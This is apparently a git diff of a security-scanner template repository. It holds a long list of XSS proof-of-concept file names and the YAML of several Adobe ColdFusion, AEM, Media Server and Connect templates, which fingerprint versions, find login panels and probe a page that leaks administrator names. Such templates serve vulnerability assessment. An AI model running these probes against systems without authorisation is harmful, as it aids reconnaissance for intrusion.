./poc/xss/akamai-arl-xss-248.yaml
@@ -104597,7 +104588,6 @@
./poc/xss/axublog-goindes-xss.yaml
./poc/xss/basic-xss-prober-695.yaml
./poc/xss/basic-xss-prober-697.yaml
-./poc/xss/basic-xss-prober-698.yaml
./poc/xss/basic-xss-prober-699.yaml
./poc/xss/basic-xss-prober.yaml
./poc/xss/bitrix-getmessage-xss.yaml
@@ -104626,13 +104616,14 @@
./poc/xss/clicshopping-v2-xss.yaml
./poc/xss/coldfusion-debug-xss-1.yaml
./poc/xss/coldfusion-debug-xss-1152.yaml
+./poc/xss/coldfusion-debug-xss-1153.yaml
./poc/xss/coldfusion-debug-xss-1154.yaml
./poc/xss/coldfusion-debug-xss-2.yaml
-./poc/xss/coldfusion-debug-xss.yaml
./poc/xss/concrete-xss-1174.yaml
./poc/xss/concrete-xss-1175.yaml
./poc/xss/concrete-xss-1176.yaml
-./poc/xss/concrete-xss-1177.yaml
+./poc/xss/concrete-xss-1178.yaml
+./poc/xss/concrete-xss.yaml
./poc/xss/concretexss.yaml
./poc/xss/ctp-xss.yaml
./poc/xss/custom-aem-xss.yaml
@@ -104653,17 +104644,17 @@
./poc/xss/drupal_module-fraction-xss-vulnerability.yaml
./poc/xss/eclipse-help-system-xss-7164.yaml
./poc/xss/eclipse-xss.yaml
-./poc/xss/elex-woocommerce-xss-7199.yaml
./poc/xss/elex-woocommerce-xss-7200.yaml
+./poc/xss/elex-woocommerce-xss.yaml
+./poc/xss/empirecms-xss-7218.yaml
./poc/xss/empirecms-xss-7219.yaml
-./poc/xss/empirecms-xss-7220.yaml
-./poc/xss/empirecms-xss.yaml
./poc/xss/eris-xss.yaml
./poc/xss/exchange-cve-2021-41349-xss.yml
./poc/xss/express-xss.yaml
+./poc/xss/feedwordpress-xss-7459.yaml
./poc/xss/feedwordpress-xss-7460.yaml
./poc/xss/feedwordpress-xss.yaml
-./poc/xss/flow-flow-social-stream-xss.yaml
+./poc/xss/flow-flow-social-stream-xss-7524.yaml
./poc/xss/fuzzing-xss-get-params-html-attribute-injection.yaml
./poc/xss/fuzzing-xss-get-params-html-injection.yaml
./poc/xss/fuzzing-xss-get-params-javascript-context-injection.yaml
@@ -104694,7 +104685,6 @@
./poc/xss/java-melody-xss.yaml
./poc/xss/jenkins-audit-trail-xss.yaml
./poc/xss/jorani-benjamin-xss.yaml
-./poc/xss/kafdrop-xss-8411.yaml
./poc/xss/kafdrop-xss-8413.yaml
./poc/xss/kafdrop-xss-8414.yaml
./poc/xss/kafdrop-xss.yaml
@@ -104707,6 +104697,7 @@
./poc/xss/keycloak-xss.yaml
./poc/xss/laravel-ignition-xss-8592.yaml
./poc/xss/laravel-ignition-xss-8593.yaml
+./poc/xss/laravel-ignition-xss.yaml
./poc/xss/ldap-wp-login-xss.yaml
./poc/xss/lucee-xss-1.yaml
./poc/xss/lucee-xss-2.yaml
@@ -104717,18 +104708,17 @@
./poc/xss/mida-eframework-xss-8866.yaml
./poc/xss/mida-eframework-xss-8867.yaml
./poc/xss/mida-eframework-xss-8868.yaml
+./poc/xss/mida-eframework-xss.yaml
./poc/xss/moodle-auth-xss.yaml
./poc/xss/moodle-filter-jmol-xss-8942.yaml
./poc/xss/moodle-filter-jmol-xss-8943.yaml
./poc/xss/moodle-filter-jmol-xss-8944.yaml
./poc/xss/moodle-filter-jmol-xss-8945.yaml
-./poc/xss/moodle-filter-jmol-xss-8946.yaml
./poc/xss/moodle-filter-jmol-xss-8947.yaml
./poc/xss/moodle-filter-jmol-xss.yaml
./poc/xss/moodle-jitsi-plugin-xss.yaml
./poc/xss/moodle-xss-8948.yaml
./poc/xss/moodle-xss-8949.yaml
-./poc/xss/moodle-xss-8950.yaml
./poc/xss/moodle-xss-8951.yaml
./poc/xss/moodle-xss-8952.yaml
./poc/xss/ms-exchange-server-reflected-xss-8962.yaml
@@ -104754,8 +104744,8 @@
./poc/xss/oracle-ebs-xss-1.yaml
./poc/xss/oracle-ebs-xss-2.yaml
./poc/xss/oracle-ebs-xss-3.yaml
+./poc/xss/oracle-ebs-xss-9373.yaml
./poc/xss/oracle-ebs-xss-9375.yaml
-./poc/xss/oracle-ebs-xss-9376.yaml
./poc/xss/oracle-ebs-xss-9377.yaml
./poc/xss/oracle-ebs-xss.yaml
./poc/xss/oracle-oam-xss.yaml
@@ -104767,6 +104757,8 @@
./poc/xss/parentlink-xss-1.yaml
./poc/xss/parentlink-xss-2.yaml
./poc/xss/parentlink-xss-9466.yaml
+./poc/xss/parentlink-xss-9467.yaml
+./poc/xss/parentlink-xss.yaml
./poc/xss/php-timeclock-xss-9550.yaml
./poc/xss/php-timeclock-xss-9551.yaml
./poc/xss/php-timeclock-xss-9552.yaml
@@ -104777,7 +104769,7 @@
./poc/xss/pmb-xss.yaml
./poc/xss/qcubed-xss-1.yaml
./poc/xss/qcubed-xss-2.yaml
-./poc/xss/qcubed-xss-9749.yaml
+./poc/xss/qcubed-xss.yaml
./poc/xss/rails6-xss-9797.yaml
./poc/xss/rails6-xss-9798.yaml
./poc/xss/rails6-xss-9799.yaml
@@ -104785,12 +104777,12 @@
./poc/xss/reflected-xss-apollo.yaml
./poc/xss/reflected-xss.yaml
./poc/xss/rockmongo-xss-9901.yaml
-./poc/xss/rockmongo-xss-9902.yaml
./poc/xss/rockmongo-xss-9903.yaml
./poc/xss/rockmongo-xss-9904.yaml
+./poc/xss/rxss.yaml
+./poc/xss/samsung-wlan-ap-xss-10012.yaml
./poc/xss/samsung-wlan-ap-xss-10013.yaml
./poc/xss/samsung-wlan-ap-xss-10014.yaml
-./poc/xss/samsung-wlan-ap-xss.yaml
./poc/xss/sassy-social-share-xss.yaml
./poc/xss/seo-panel-reset-password-xss.yaml
./poc/xss/setPreferences-xss.yaml
@@ -104804,11 +104796,12 @@
./poc/xss/sniplets-xss-10344.yaml
./poc/xss/sniplets-xss-10345.yaml
./poc/xss/sniplets-xss.yaml
-./poc/xss/squirrelmail-add-xss.yaml
+./poc/xss/squirrelmail-add-xss-10515.yaml
./poc/xss/squirrelmail-vkeyboard-xss-10522.yaml
./poc/xss/swagger-xss.yaml
./poc/xss/t-soft-e-commerce4-urunadi-stored-xss.yaml
./poc/xss/thruk-xss-10758.yaml
+./poc/xss/thruk-xss-10759.yaml
./poc/xss/tikiwiki-reflected-xss-1.yaml
./poc/xss/tikiwiki-reflected-xss-10777.yaml
./poc/xss/tikiwiki-reflected-xss-10778.yaml
@@ -104818,8 +104811,8 @@
./poc/xss/tikiwiki-xss.yaml
./poc/xss/top-15-xss.yaml
./poc/xss/top-xss-params-10806.yaml
+./poc/xss/top-xss-params-10807.yaml
./poc/xss/top-xss-params-10808.yaml
-./poc/xss/top-xss-params-10809.yaml
./poc/xss/top-xss-params.yaml
./poc/xss/turbocrm-xss-10848.yaml
./poc/xss/turbocrm-xss-10849.yaml
@@ -104834,16 +104827,15 @@
./poc/xss/weblogic-servlet-xss.yml
./poc/xss/wems-enterprise-xss.yaml
./poc/xss/wems-manager-xss-11191.yaml
+./poc/xss/wems-manager-xss-11192.yaml
./poc/xss/wems-manager-xss-11193.yaml
./poc/xss/wems-manager-xss-11194.yaml
-./poc/xss/wems-manager-xss.yaml
./poc/xss/window-name-domxss-11212.yaml
+./poc/xss/window-name-domxss-11213.yaml
./poc/xss/window-name-domxss-11214.yaml
-./poc/xss/window-name-domxss.yaml
./poc/xss/wordpress-wordfence-waf-bypass-xss-11353.yaml
./poc/xss/wordpress-wordfence-waf-bypass-xss-11354.yaml
./poc/xss/wordpress-wordfence-waf-bypass-xss-11355.yaml
-./poc/xss/wordpress-wordfence-waf-bypass-xss-11356.yaml
./poc/xss/wordpress-wordfence-xss-11357.yaml
./poc/xss/wordpress-wordfence-xss-11358.yaml
./poc/xss/wordpress-wordfence-xss-11359.yaml
@@ -104853,11 +104845,12 @@
./poc/xss/wordpress-zebra-form-xss-11375.yaml
./poc/xss/wordpress-zebra-form-xss-11376.yaml
./poc/xss/wordpress-zebra-form-xss-11377.yaml
-./poc/xss/wordpress-zebra-form-xss-11378.yaml
+./poc/xss/wordpress-zebra-form-xss-11379.yaml
./poc/xss/wordpress-zebra-form-xss.yaml
./poc/xss/wp-adaptive-xss-11403.yaml
./poc/xss/wp-adaptive-xss-11404.yaml
./poc/xss/wp-adaptive-xss.yaml
+./poc/xss/wp-ambience-xss-11407.yaml
./poc/xss/wp-ambience-xss-11409.yaml
./poc/xss/wp-ambience-xss-11410.yaml
./poc/xss/wp-ambience-xss.yaml
@@ -104868,14 +104861,13 @@
./poc/xss/wp-church-admin-xss-11423.yaml
./poc/xss/wp-church-admin-xss-11424.yaml
./poc/xss/wp-church-admin-xss.yaml
-./poc/xss/wp-code-snippets-xss-11425.yaml
./poc/xss/wp-code-snippets-xss-11426.yaml
+./poc/xss/wp-code-snippets-xss.yaml
./poc/xss/wp-custom-tables-xss-11431.yaml
./poc/xss/wp-custom-tables-xss-11432.yaml
-./poc/xss/wp-custom-tables-xss-11434.yaml
+./poc/xss/wp-custom-tables-xss-11433.yaml
./poc/xss/wp-custom-tables-xss-11435.yaml
./poc/xss/wp-custom-tables-xss.yaml
-./poc/xss/wp-finder-xss-11445.yaml
./poc/xss/wp-finder-xss-11447.yaml
./poc/xss/wp-finder-xss-11448.yaml
./poc/xss/wp-finder-xss-11449.yaml
@@ -104890,14 +104882,13 @@
./poc/xss/wp-knews-xss-11484.yaml
./poc/xss/wp-knews-xss-11485.yaml
./poc/xss/wp-knews-xss-11486.yaml
-./poc/xss/wp-knews-xss-11487.yaml
+./poc/xss/wp-knews-xss-11488.yaml
./poc/xss/wp-knews-xss.yaml
./poc/xss/wp-nextgen-xss-11514.yaml
./poc/xss/wp-nextgen-xss-11515.yaml
./poc/xss/wp-nextgen-xss-11516.yaml
./poc/xss/wp-nextgen-xss-11518.yaml
./poc/xss/wp-nextgen-xss.yaml
-./poc/xss/wp-phpfreechat-xss-11524.yaml
./poc/xss/wp-phpfreechat-xss-11526.yaml
./poc/xss/wp-phpfreechat-xss-11527.yaml
./poc/xss/wp-phpfreechat-xss-11528.yaml
@@ -104906,12 +104897,12 @@
./poc/xss/wp-plugin-marmoset-viewer-xss-11538.yaml
./poc/xss/wp-plugin-marmoset-viewer-xss.yaml
./poc/xss/wp-qwiz-online-xss.yaml
+./poc/xss/wp-securimage-xss-11556.yaml
./poc/xss/wp-securimage-xss-11558.yaml
./poc/xss/wp-securimage-xss-11559.yaml
-./poc/xss/wp-securimage-xss-11560.yaml
./poc/xss/wp-securimage-xss.yaml
-./poc/xss/wp-slideshow-xss-11572.yaml
./poc/xss/wp-slideshow-xss-11573.yaml
+./poc/xss/wp-slideshow-xss-11574.yaml
./poc/xss/wp-slideshow-xss-11575.yaml
./poc/xss/wp-slideshow-xss-11576.yaml
./poc/xss/wp-slideshow-xss.yaml
@@ -104922,6 +104913,7 @@
./poc/xss/wp-socialfit-xss-11582.yaml
./poc/xss/wp-socialfit-xss.yaml
./poc/xss/wp-whmcs-xss-11613.yaml
+./poc/xss/wp-whmcs-xss-11614.yaml
./poc/xss/wp-whmcs-xss.yaml
./poc/xss/wpmudev-my-calender-xss-11503.yaml
./poc/xss/wpmudev-my-calender-xss.yaml
diff --git a/poc/adobe/adobe-coldfusion-detect-82.yaml b/poc/adobe/adobe-coldfusion-detect-82.yaml
deleted file mode 100644
index 0d9330c87c..0000000000
--- a/poc/adobe/adobe-coldfusion-detect-82.yaml
+++ /dev/null
@@ -1,62 +0,0 @@
-id: adobe-coldfusion-detect
-
-info:
- name: Adobe ColdFusion Detector
- author: philippedelteil
- severity: info
- description: With this template we can detect the version number of Coldfusion instances based on their logos.
- tags: adobe,coldfusion
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif"
- - "{{BaseURL}}/cfide/administrator/images/mx_login.gif"
- - "{{BaseURL}}/CFIDE/administrator/images/background.jpg"
- - "{{BaseURL}}/cfide/administrator/images/background.jpg"
- - "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg"
- - "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg"
-
- redirects: true
- stop-at-first-match: true
- max-redirects: 2
- matchers:
- - type: dsl
- name: "coldfusion-8"
- dsl:
- - "status_code==200 && (\"da07693b70ddbac5bc0d8bf98d4a3539\" == md5(body))"
-
- - type: dsl
- name: "coldfusion-9"
- dsl:
- - "status_code==200 && (\"c0757351b00f7ecf35a035c976068d12\" == md5(body))"
-
- - type: dsl
- name: "coldfusion-10"
- dsl:
- - "status_code==200 && (\"a4c81b7a6289b2fc9b36848fa0cae83c\" == md5(body))"
-
- - type: dsl
- name: "coldfusion-11"
- dsl:
- - "status_code==200 && (\"7f024de9f480481ca03049e0d66679d6\" == md5(body))"
-
- - type: dsl
- name: "coldfusion-2016"
- dsl:
- - "status_code==200 && (\"f1281b6866aef66e35dc36fe4f0bf990\" == md5(body))"
-
- - type: dsl
- name: "coldfusion-2021"
- dsl:
- - "status_code==200 && (\"a88530d7f1980412dac076de732a4e86\" == md5(body))"
-
- - type: dsl
- name: "coldfusion-2018"
- dsl:
- - "status_code==200 && (\"92ef6ee3c4d1700e3cca797b19d3e7ba\" == md5(body))"
-
- - type: dsl
- name: "coldfusion-mx-7"
- dsl:
- - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))"
diff --git a/poc/adobe/adobe-coldfusion-detect-83.yaml b/poc/adobe/adobe-coldfusion-detect-83.yaml
index e19f7d4be2..8bd7130d99 100644
--- a/poc/adobe/adobe-coldfusion-detect-83.yaml
+++ b/poc/adobe/adobe-coldfusion-detect-83.yaml
@@ -7,11 +7,10 @@ info:
description: With this template we can detect the version number of Coldfusion instances based on their logos.
metadata:
verified: true
- max-request: 6
shodan-query: http.component:"Adobe ColdFusion"
- tags: adobe,coldfusion,tech
+ tags: adobe,coldfusion
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif"
@@ -21,7 +20,7 @@ http:
- "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg"
- "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg"
- host-redirects: true
+ redirects: true
stop-at-first-match: true
max-redirects: 2
matchers:
@@ -64,5 +63,3 @@ http:
name: "coldfusion-mx-7"
dsl:
- "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))"
-
-# digest: 4a0a00473045022100faa12701b8bc27ab386795db36e16861a6a66b66d8fb9cd15ac80cb9409141df02205a53027693929221e1489f3e72cf8d72c2b6061ffced415bc66e005548780060:922c64590222798bb761d5b6d8e72950
diff --git a/poc/adobe/adobe-coldfusion-error-detect-86.yaml b/poc/adobe/adobe-coldfusion-error-detect-86.yaml
new file mode 100644
index 0000000000..57e6f15254
--- /dev/null
+++ b/poc/adobe/adobe-coldfusion-error-detect-86.yaml
@@ -0,0 +1,29 @@
+id: adobe-coldfusion-error-detect
+
+info:
+ name: Adobe ColdFusion Detector
+ author: philippedelteil
+ severity: info
+ description: With this template we can detect a running ColdFusion instance due to an error page.
+ reference:
+ - https://twitter.com/PhilippeDelteil/status/1418622775829348358
+ metadata:
+ verified: true
+ shodan-query: http.component:"Adobe ColdFusion"
+ tags: adobe,coldfusion
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/_something_.cfm"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'ColdFusion documentation'
+
+ - type: status
+ status:
+ - 404
diff --git a/poc/adobe/adobe-coldfusion-error-detect-88.yaml b/poc/adobe/adobe-coldfusion-error-detect.yaml
similarity index 100%
rename from poc/adobe/adobe-coldfusion-error-detect-88.yaml
rename to poc/adobe/adobe-coldfusion-error-detect.yaml
diff --git a/poc/adobe/adobe-component-login-89.yaml b/poc/adobe/adobe-component-login-89.yaml
new file mode 100644
index 0000000000..9b423f9a58
--- /dev/null
+++ b/poc/adobe/adobe-component-login-89.yaml
@@ -0,0 +1,32 @@
+id: adobe-coldfusion-login
+
+info:
+ name: Adobe ColdFusion Component Browser Login Panel
+ author: dhiyaneshDK
+ description: An Adobe ColdFusion Component Browser login panel was detected.
+ severity: info
+ reference:
+ - https://www.exploit-db.com/ghdb/6846
+ tags: panel,adobe,coldfusion
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0.0
+ cve-id:
+ cwe-id: CWE-200
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/CFIDE/componentutils/login.cfm'
+ - '{{BaseURL}}/cfide/componentutils/login.cfm'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Component Browser Login'
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/20
diff --git a/poc/adobe/adobe-component-login-90.yaml b/poc/adobe/adobe-component-login-90.yaml
deleted file mode 100644
index 1d46e94118..0000000000
--- a/poc/adobe/adobe-component-login-90.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: adobe-coldfusion-login
-
-info:
- name: Adobe ColdFusion Component Browser Login Panel
- author: dhiyaneshDK
- severity: info
- description: An Adobe ColdFusion Component Browser login panel was detected.
- reference:
- - https://www.exploit-db.com/ghdb/6846
- classification:
- cwe-id: CWE-200
- metadata:
- shodan-query: http.component:"Adobe ColdFusion"
- tags: panel,adobe,coldfusion
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/CFIDE/componentutils/login.cfm'
- - '{{BaseURL}}/cfide/componentutils/login.cfm'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Component Browser Login'
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/20
diff --git a/poc/adobe/adobe-component-login-91.yaml b/poc/adobe/adobe-component-login-91.yaml
new file mode 100644
index 0000000000..c0042aed5b
--- /dev/null
+++ b/poc/adobe/adobe-component-login-91.yaml
@@ -0,0 +1,23 @@
+id: adobe-component-login
+
+info:
+ name: Adobe Component Browser Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6846
+ tags: panel,adobe
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/CFIDE/componentutils/login.cfm'
+ - '{{BaseURL}}/cfide/componentutils/login.cfm'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Component Browser Login'
+ - type: status
+ status:
+ - 200
diff --git a/poc/adobe/adobe-component-login-92.yaml b/poc/adobe/adobe-component-login-92.yaml
index cf0a6e2a19..cc39191db5 100644
--- a/poc/adobe/adobe-component-login-92.yaml
+++ b/poc/adobe/adobe-component-login-92.yaml
@@ -1,17 +1,15 @@
id: adobe-component-login
-
info:
- name: Adobe Component Brower Login
+ name: Adobe Component Browser Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6846
- tags: panel
-
+ tags: panel,adobe
requests:
- method: GET
path:
- '{{BaseURL}}/CFIDE/componentutils/login.cfm'
-
+ - '{{BaseURL}}/cfide/componentutils/login.cfm'
matchers-condition: and
matchers:
- type: word
diff --git a/poc/adobe/adobe-connect-central-login-93.yaml b/poc/adobe/adobe-connect-central-login-96.yaml
similarity index 100%
rename from poc/adobe/adobe-connect-central-login-93.yaml
rename to poc/adobe/adobe-connect-central-login-96.yaml
diff --git a/poc/adobe/adobe-connect-username-exposure-100.yaml b/poc/adobe/adobe-connect-username-exposure-100.yaml
deleted file mode 100644
index 2e4d3089a9..0000000000
--- a/poc/adobe/adobe-connect-username-exposure-100.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: adobe-connect-username-exposure
-
-info:
- name: Adobe Connect Username Exposure
- author: dhiyaneshDk
- severity: low
- reference:
- - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
- tags: adobe,disclosure
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/system/help/support"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Administrators name:'
- - 'Support Administrators email address:'
- part: body
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/poc/adobe/adobe-connect-username-exposure-101.yaml b/poc/adobe/adobe-connect-username-exposure-101.yaml
index e47b4fe88b..088b39ad5e 100644
--- a/poc/adobe/adobe-connect-username-exposure-101.yaml
+++ b/poc/adobe/adobe-connect-username-exposure-101.yaml
@@ -1,26 +1,26 @@
-id: adobe-connect-username-exposure
-
-info:
- name: Adobe Connect Username Exposure
- reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
- author: dhiyaneshDk
- severity: low
- tags: adobe,disclosure
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/system/help/support"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Administrators name:'
- - 'Support Administrators email address:'
- part: body
- condition: and
-
- - type: status
- status:
- - 200
+id: adobe-connect-username-exposure
+
+info:
+ name: Adobe Connect Username Exposure
+ reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
+ author: dhiyaneshDk
+ severity: low
+ tags: adobe,disclosure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/system/help/support"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Administrators name:'
+ - 'Support Administrators email address:'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/adobe/adobe-connect-username-exposure-98.yaml b/poc/adobe/adobe-connect-username-exposure-98.yaml
index 088b39ad5e..2e4d3089a9 100644
--- a/poc/adobe/adobe-connect-username-exposure-98.yaml
+++ b/poc/adobe/adobe-connect-username-exposure-98.yaml
@@ -2,9 +2,10 @@ id: adobe-connect-username-exposure
info:
name: Adobe Connect Username Exposure
- reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
author: dhiyaneshDk
severity: low
+ reference:
+ - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
tags: adobe,disclosure
requests:
diff --git a/poc/adobe/adobe-connect-version-104.yaml b/poc/adobe/adobe-connect-version-104.yaml
deleted file mode 100644
index 95b454f2f8..0000000000
--- a/poc/adobe/adobe-connect-version-104.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: adobe-connect-version
-
-info:
- name: Adobe Connect Central Version
- author: dhiyaneshDk
- severity: info
- metadata:
- max-request: 1
- tags: adobe,misconfig
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/version.txt"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'package='
- part: body
-
- - type: word
- words:
- - 'text/plain'
- part: header
-
- - type: status
- status:
- - 200
-
-# digest: 4a0a00473045022100e63b3b76732fe722d3d76c704705f5f1fdab83c771742ce8a0f8cd2ed2fa2e5c022053f49fe20114fce1d298f13d19d4b25108498ca1d7f3591f4c6cd033205b4d09:922c64590222798bb761d5b6d8e72950
diff --git a/poc/adobe/adobe-connect-version-102.yaml b/poc/adobe/adobe-connect-version.yaml
similarity index 100%
rename from poc/adobe/adobe-connect-version-102.yaml
rename to poc/adobe/adobe-connect-version.yaml
diff --git a/poc/adobe/adobe-experience-manager-login-105.yaml b/poc/adobe/adobe-experience-manager-login-105.yaml
deleted file mode 100644
index 4dbdef1e18..0000000000
--- a/poc/adobe/adobe-experience-manager-login-105.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: adobe-experience-manager-login
-
-info:
- name: Adobe Experience Manager Login Panel
- author: dhiyaneshDK
- description: An Adobe Experience Manager login panel was detected.
- severity: info
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22
- - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html
- tags: panel,aem,adobe
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
- cve-id:
- cwe-id: CWE-200
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/libs/granite/core/content/login.html'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'AEM Sign In'
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/20
diff --git a/poc/adobe/adobe-experience-manager-login-106.yaml b/poc/adobe/adobe-experience-manager-login-106.yaml
new file mode 100644
index 0000000000..2162a6646f
--- /dev/null
+++ b/poc/adobe/adobe-experience-manager-login-106.yaml
@@ -0,0 +1,23 @@
+id: adobe-experience-manager-login
+
+info:
+ name: Adobe-Experience-Manager
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22
+ tags: panel,aem,adobe
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/libs/granite/core/content/login.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'AEM Sign In'
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/adobe/adobe-experience-manager-login-109.yaml b/poc/adobe/adobe-experience-manager-login-109.yaml
index 9148cd29f0..4dbdef1e18 100644
--- a/poc/adobe/adobe-experience-manager-login-109.yaml
+++ b/poc/adobe/adobe-experience-manager-login-109.yaml
@@ -3,15 +3,17 @@ id: adobe-experience-manager-login
info:
name: Adobe Experience Manager Login Panel
author: dhiyaneshDK
- severity: info
description: An Adobe Experience Manager login panel was detected.
+ severity: info
reference:
+ - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22
- https://business.adobe.com/products/experience-manager/adobe-experience-manager.html
+ tags: panel,aem,adobe
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0.0
+ cve-id:
cwe-id: CWE-200
- metadata:
- shodan-query: http.title:"AEM Sign In"
- tags: panel,aem,adobe
requests:
- method: GET
diff --git a/poc/adobe/adobe-media-server-114.yaml b/poc/adobe/adobe-media-server-114.yaml
new file mode 100644
index 0000000000..deaf55913a
--- /dev/null
+++ b/poc/adobe/adobe-media-server-114.yaml
@@ -0,0 +1,23 @@
+id: adobe-media-server
+
+info:
+ name: Adobe Media Server
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
+ tags: panel,adobe
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Adobe Media Server'
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/adobe/adobe-media-server-115.yaml b/poc/adobe/adobe-media-server-115.yaml
index deaf55913a..2ee6efc2c8 100644
--- a/poc/adobe/adobe-media-server-115.yaml
+++ b/poc/adobe/adobe-media-server-115.yaml
@@ -1,10 +1,15 @@
id: adobe-media-server
info:
- name: Adobe Media Server
+ name: Adobe Media Server Login Panel
author: dhiyaneshDK
severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
+ description: An Adobe Media Server login panel was detected.
+ reference:
+ - https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
+ - https://helpx.adobe.com/support/adobe-media-server.html
+ classification:
+ cwe-id: CWE-200
tags: panel,adobe
requests:
@@ -21,3 +26,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/20
diff --git a/poc/adobe/adobe-media-server.yaml b/poc/adobe/adobe-media-server.yaml
deleted file mode 100644
index 2ee6efc2c8..0000000000
--- a/poc/adobe/adobe-media-server.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: adobe-media-server
-
-info:
- name: Adobe Media Server Login Panel
- author: dhiyaneshDK
- severity: info
- description: An Adobe Media Server login panel was detected.
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
- - https://helpx.adobe.com/support/adobe-media-server.html
- classification:
- cwe-id: CWE-200
- tags: panel,adobe
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Adobe Media Server'
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/20
diff --git a/poc/adobe/aem-bg-servlet-129.yaml b/poc/adobe/aem-bg-servlet-129.yaml
deleted file mode 100644
index b751c4f52a..0000000000
--- a/poc/adobe/aem-bg-servlet-129.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: aem-bg-servlet
-
-info:
- name: AEM BG-Servlets
- author: DhiyaneshDk
- severity: info
- reference:
- - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212
- metadata:
- max-request: 1
- shodan-query: http.component:"Adobe Experience Manager"
- tags: aem,misconfig
-
-http:
- - method: GET
- path:
- - '{{BaseURL}}/system/bgservlets/test.css'
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - '
Flushing output
'
-
-# digest: 4a0a00473045022011679f68ea9ea8736dfbf616cd843e2cd2a218f0f4d79653b8e1b3f66e88310a022100e65d71edf92b948507e7fd6c201b5804ca45fc3c262753fe9804347322869acf:922c64590222798bb761d5b6d8e72950
diff --git a/poc/adobe/aem-bg-servlet.yaml b/poc/adobe/aem-bg-servlet.yaml
new file mode 100644
index 0000000000..6a3c2a07b3
--- /dev/null
+++ b/poc/adobe/aem-bg-servlet.yaml
@@ -0,0 +1,24 @@
+id: aem-bg-servlet
+
+info:
+ name: AEM BG-Servlets
+ author: DhiyaneshDk
+ severity: info
+ reference:
+ - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212
+ tags: aem
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/system/bgservlets/test.css'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '
Flushing output
'
\ No newline at end of file
